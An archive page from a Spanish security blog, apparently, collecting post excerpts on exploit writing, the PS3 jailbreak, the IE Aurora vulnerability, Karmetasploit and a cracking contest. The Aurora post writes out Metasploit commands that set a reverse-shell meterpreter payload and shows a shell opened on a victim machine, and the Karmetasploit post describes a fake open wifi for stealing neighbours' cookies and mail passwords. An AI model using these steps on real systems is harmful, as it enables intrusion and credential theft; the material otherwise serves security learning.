Pepelux

blog

Archivo de la categoría Exploits

Creación de shellcodes y exploits en win32

jun 22

Publicado por Pepelux en Cracking, Exploits, Hacking, Linux, Programación ASM, Shellcodes | 1 Comentario

–[ Contenido

1 – Introduccion

2 – Antes de empezar
2.1 – Conocimientos previos
2.2 – Herramientas

3 – Creando un exploit local
3.1 – Creando un programa vulnerable
3.2 – Programando una shellcode
3.3 – Creando un exploit

4 – Creando otro exploit local
4.1 – Programando una shellcode
4.2 – Creando un exploit
4.3 – Solucion de problemas

5 – Haciendo mas estandar nuestro exploit

6 – Creando un exploit remoto
6.1 – Creando un programa vulnerable
6.2 – Programando una shellcode
6.3 – Creando un exploit

7 – Referencias

8 – Agradecimientos

ver la entrada completa

Etiquetas: , , , ,

La PS3 ya es pirateable

ene 29

Publicado por Pepelux en Cracking, Exploits | 3 Comentarios

El hacker George Hotz (más conocido por GeoHot y que saltó a la fama por crackear el iPhone) ha conseguido esta vez encontrar una vulnerabilidad en la PS3 que le permite acceder a las zonas privadas y modificar a su antojo. Y no sólo esto … ya ha publicado un exploit que permite acceder a dichas zonas de forma ilimitada.

Dentro de poco veremos a la gente buscando en Megaupload y Rapidshare juegos de PS3 y seguro que muchos programadores de juegos están ya con las manos en la cabeza. Pero apuesto lo que sea a que ahora que es pirateable, se dispararán las ventas de esta consola :)

Para más información:

El exploit lo podeis encontrar aquí

Y el blog de GeoHot aquí

Etiquetas: ,

Aurora (última vulnerabilidad de Internet Explorer)

ene 17

Publicado por Pepelux en Exploits, Hacking, Metasploit | 2 Comentarios

Al fin se ha publicado la vulnerabilidad, que afecta a mshtml.dll en Internet Explorer 6 y posiblemente 7 y 8 que no usen DEP. En Metasploit ya han sacado un exploit para poder testear si somos vulnerables. Para probarlo, según pone en el blog de Metasploit, hacemos un msfupdate y luego abrimos msfconsole:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Luego en la máquina vulnerable abrimos Internet Explorer y cargamos http://192.168.0.151:8080/ (cambiando 192.168.0.151 por la IP de la máquina que ejecuta metasploit)

Si todo va bien, obtendremos:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia…success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

Se puede obtener más información y ver un vídeo demostrativo en la página de pentester.es

Etiquetas: ,

Karmetasploit

ene 10

Publicado por Pepelux en Aircrack-ng, Exploits, Hacking, Metasploit, Wifi | 3 Comentarios

El otro día vi en el foro de elhacker.net un post que hablaba sobre karmetasploit y me puse a indagar un poco a ver como iba esto (que lo suyo me costó jeje todo hay que decirlo. En el portátil no hubo forma pero en el PC funcionó a la primera).

Karmetasploit es un plugin de metasploit que usándolo junto con aircrack-ng te permite ir de pesca por el vecindario, o lo que es lo mismo, te permite crear una wifi falsa y totalmente abierta para incitar a los vecinos listillos que quieran conectarse gratis a Internet. Tras conectarse, en el peor de los casos les roba las cookies y si intentan acceder al correo, también las contraseñas de POP. Y en el mejor de los casos, si su sistema operativo tiene algún bug trata de explotárselo llegándote a dar una shell si es posible.

La información original de karmetasploit la puedes ver aquí: http://www.offensive-security.com/metasploit-unleashed/Karmetasploit

Leer el resto de esta entrada »

Etiquetas: , , ,

Concursos CrackSLatinoS

ene 3

Publicado por Pepelux en Cracking, Exploits | No hay comentarios

Para el que no conozca CrackSLatinoS, es una comunidad de crackers en la que se todan todos los temas de ingeniería inversa (cracking, reverses, exploits, malwares, etc). De la mano del gran maestro Ricardo Narvaja, hay toda una lista de expertos en la materia que puedes encontrar en el grupo: http://groups.google.com/group/crackslatinos?hl=es.

Si te gusta la ingeriería inversa, en la web de Ricardo tienes manuales para aburrir, de todo tipo. Es más, cada mes hay concursos con diversas secciones en los que vengo colaborando desde hace unos meses. Entre los concursos y la cantidad de manuales (miles) que hay en su web (y todos en la lengua de cervantes) he podido aprender muchisimo. Gracias a la ayuda de todos los miembros de CrackSLatinoS que son una gente fantástica y siempre hacen lo posible por ayudar con tus dudas.

Como ya he comentado, llevo unos meses haciendo los concursos, en los que a final de mes enviamos un tutorial con nuestras soluciones. Luego Ricardo los sube todos a su web y se convierten en nuevos manuales de obligada lectura. De esta forma la información nunca está obsoleta ya que, muchas veces buscamos información en Internet sobre algo y vemos manuales muy antiguos que ya no sirven en estos tiempos.

Dejo un link al último tutorial que mandé para el concurso (correcpondiente a la sección de Exploitme) en el que había que hacer un exploit para el programa NaviCOPA, que es un servidor web para Windows. Podeis descargar el tutorial aquí: exploit NaviCOPA

El exploit lo resuelvo de dos formas:

  • Buscando con un pequeño script y con la ayuda del OllyDbg el tamaño donde se desborda el buffer
  • Comparando con Turbodiff las diferencias entre esta versión y la siguien en la que está parcheado el error

Aprovecho para dar las gracias al maestro Ricardo Narvaja por el tuto de Turbodiff y por resolver siempre mis dudas.